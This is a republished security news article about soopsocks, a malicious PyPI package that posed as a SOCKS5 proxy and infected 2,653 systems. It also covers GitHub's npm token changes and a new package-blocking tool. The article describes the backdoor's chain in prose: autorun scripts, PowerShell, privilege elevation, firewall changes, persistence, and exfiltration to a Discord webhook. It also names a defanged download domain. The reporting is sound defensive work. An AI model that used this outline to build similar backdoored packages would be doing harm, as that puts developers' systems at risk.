Close Menu
TechurzTechurz
    What's Hot

    Humble Robotics’ CEO says the tech finally caught up to the vision for autonomous vehicles

    July 1, 2026

    Autonomous vehicle hype is back, and Humble Robotics is bringing it to freights

    July 1, 2026

    Builders Stage agenda revealed for Disrupt 2026

    July 1, 2026
    X (Twitter) Pinterest YouTube LinkedIn WhatsApp
    Tech Pulse
    • Humble Robotics’ CEO says the tech finally caught up to the vision for autonomous vehicles
    • Autonomous vehicle hype is back, and Humble Robotics is bringing it to freights
    • Builders Stage agenda revealed for Disrupt 2026
    • Startup Battlefield Australia application closes in days: Apply before July 6
    • Acti puts AI agents directly into your smartphone keyboard
    X (Twitter) Pinterest YouTube LinkedIn WhatsApp
    TechurzTechurz
    • Home
    • Tech Pulse
    • Future Tech
    • AI Systems
    • Cyber Reality
    • Disruption Lab
    • Signals
    TechurzTechurz
    Home - Cyber Reality - Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown
    Cyber Reality

    Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown

    TechurzBy TechurzOctober 2, 2025Updated:May 10, 2026No Comments3 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Malicious PyPI Package
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Oct 02, 2025Ravie LakshmananPython / Malware

    Cybersecurity researchers have flagged a malicious package on the Python Package Index (PyPI) repository that claims to offer the ability to create a SOCKS5 proxy service, while also providing a stealthy backdoor-like functionality to drop additional payloads on Windows systems.

    The deceptive package, named soopsocks, attracted a total of 2,653 downloads before it was taken down. It was first uploaded by a user named “soodalpie” on September 26, 2025, the same date the account was created.

    “While providing this capability, it exhibits behavior as a backdoor proxy server targeting Windows platforms, using automated installation processes via VBScript or an executable version,” JFrog said in an analysis.

    The executable (“_AUTORUN.EXE”) is a compiled Go file that, besides including a SOCKS5 implementation as advertised, is also designed to run PowerShell scripts, set firewall rules, and relaunch itself with elevated permissions. It also carries out basic system and network reconnaissance, including Internet Explorer security settings and Windows installation date, and exfiltrates the information to a hard-coded Discord webhook.

    “_AUTORUN.VBS,” the Visual Basic Script launched by the Python package in versions 0.2.5 and 0.2.6, is also capable of running a PowerShell script, which then downloads a ZIP file containing the legitimate Python binary from an external domain (“install.soop[.]space:6969”) and generates a batch script that’s configured to install the package using the “pip install” command and run it.

    The PowerShell script then invokes the batch script, causing the Python package to be executed, which, in turn, elevates itself to run with administrative privileges (if not already), configure firewall rules to allow UDP and TCP communication via port 1080, install as a service, maintain communication with a Discord webhook, and set up persistence on the host using a scheduled task to make sure it automatically starts upon a system reboot.

    “soopsocks is a well-designed SOCKS5 proxy with full bootstrap Windows support,” JFrog said. “However, given the way it performs and actions it takes during runtime, it shows signs of malicious activity, such as firewall rules, elevated permissions, various PowerShell commands, and the transfer from simple, configurable Python scripts to a Go executable with hardcoded parameters, version with reconnaissance capabilities to a predetermined Discord webhook.”

    The disclosure comes as npm package maintainers have raised concerns related to a lack of native 2FA workflows for CI/CD, self-hosted workflow support for trusted publishing, and token management following sweeping changes introduced by GitHub in response to a growing wave of software supply chain attacks, Socket said.

    Earlier this week, GitHub said it will shortly revoke all legacy tokens for npm publishers and that all granular access tokens for npm will have a default expiration of seven days (down from 30 days) and a maximum expiration of 90 days, which used to be unlimited previously.

    “Long-lived tokens are a primary vector for supply chain attacks. When tokens are compromised, shorter lifetimes limit the window of exposure and reduce potential damage,” it said. “This change brings npm in line with security best practices already adopted across the industry.”

    It also comes as the software supply chain security firm released a free tool called Socket Firewall that blocks malicious packages at install time across npm, Python, and Rust ecosystems, giving developers the ability to safeguard their environments against potential threats.

    “Socket Firewall isn’t limited to protecting you from problematic top-level dependencies. It will also prevent the package manager from fetching any transitive dependency that is known to be malicious,” the company added.

    Infects Malicious package PyPI soopsocks systems Takedown
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleOpenAI is the world’s most valuable private company after private stock sale
    Next Article 10 Linux tips I give to both beginners and professionals for improved productivity
    Techurz
    • Website

    Related Posts

    Cyber Reality

    Digital Identity Protection: 7 Hidden Risks Most Users Miss

    May 25, 2026
    Cyber Reality

    Neural Data Policy: 7 Risks That Brain Privacy Laws Miss

    May 25, 2026
    Cyber Reality

    How AI Changing Cyber Crime: 7 Critical Shifts to Watch

    May 25, 2026
    Add A Comment
    Latest Tech Pulse

    College social app Fizz expands into grocery delivery

    September 3, 20252,290

    SolarSquare in talks to raise up to $60M as India’s rooftop solar market draws major VC interest

    May 23, 202622

    Future of Digital Privacy and Security: 7 Truths Nobody Tells You

    May 25, 202619
    Stay In Touch
    • YouTube
    • WhatsApp
    • Twitter
    • Pinterest
    • LinkedIn

    Techurz helps readers stay ahead of digital change with clear, practical, future focused technology intelligence written today,searched tomorrow.

    X (Twitter) Pinterest YouTube LinkedIn WhatsApp
    Company
    • About Us
    • Contact Us
    • Our Authors / Editorial Team
    • Write For Us
    • Advertise
    Policy
    • Editorial Policy
    • Privacy Policy
    • Terms and Conditions
    • Affiliate Disclosure
    • Cookie Policy
    • Disclaimer
    • DMCA
    Explore
    • AI Systems
    • Cyber Reality
    • Future Tech
    • Disruption Lab
    • Signals
    • Tech Pulse
    • Sitemap

    Join the Techurz Brief

    The future does not arrive suddenly.
    Stay ahead with fast, sharp tech signals.

    Type above and press Enter to search. Press Esc to cancel.